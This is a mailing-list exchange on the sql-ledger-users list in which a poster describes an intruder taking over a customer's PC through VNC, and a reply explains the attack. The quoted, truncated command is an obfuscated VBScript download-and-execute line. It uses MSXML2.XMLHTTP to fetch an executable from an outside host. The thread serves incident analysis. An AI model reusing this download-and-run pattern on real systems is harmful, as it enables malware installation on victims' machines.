Chris Curtis wrote:
> Hello All. This is very off topic, but I figure it won't kill anyone
> if I ask. There are a number of very smart cookies on this list, and
> I bet someone out there can enlighten me.
>
> Today I got a call from one off my customers who runs VNC for remote
> support access. She was working away, and suddenly her mouse
> started to move, it opened up a CMD session (it's really a DOS
> session, but we aren't supposed to know that Windows is just another
> DOS app are we!!!) and it typed the following:
>
> C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE
> nExt:F="L.eXe":SEt
> p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/
> NETSTAT
> On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct
> ("mSxmL2.xmLhttp"):p.OpEn"gEt",
> "HtTp://WwW.JmDoNgyI.CoM/
>
>
First off, this looks incomplete... and from what I can see wouldn't do
much...
It looks like it's attempting to use XMLHttp to retrieve an executable
file from that website. A lot of the commands it's using wouldn't do
anything under a cmd prompt, but would if it were using something like
CSCRIPT, to execute VBScript.
If you have the *exact* text typed into the cmd window (without
formatting changed, or even a screen shot), it might reveal more... I
would have expected to see some redirection of the ECHO command to a
temp file, then executing that file using CSCRIPT.
The & in the first line just makes it execute the next command (like &&
does in *NIX)
The next command being "echo xxx", where xxx looks like some VBScript
code, *but* some bits are missing, like closing quotes, etc.
> Now, I am not an XML guy, but it looks to me like this person was
> trying to use XML and download content from a likely infected
> website. I went to the website (I use a MAC, so I don't generally
> worry about getting a browser hack) and, you guessed it, it was a
> Chinese site. I googled the www.jmdongyi.com name but got no hits.
>
> I connected to her PC and found no strange connections to it at the
> time. I ran a malware, virus scan and it was clean also. I had her
> turn off vnc for now and explained to her how she could turn it on
> when she needs to allow someone access. Incidentally, she was using
> a non dictionary password with alpha and numeric characters.
>
> My question is, what was the XML string actually trying to do.
>
> Thanks to all who offer assistance.
>
>
>
Either the version of VNC in use has a remotely exploitable bug, or it
was a "cracked" version that was installed, which allowed someone to
connect.
Hope that sheds some light on what was attempted...
Regards
--
Richard Patterson HelpQuick Limited
Tel: 0191 2582888 Fax: 0191 6408666
Jabber chat: [EMAIL PROTECTED]
Web: http://www.helpquick.co.uk
-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys -- and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
_______________________________________________
sql-ledger-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
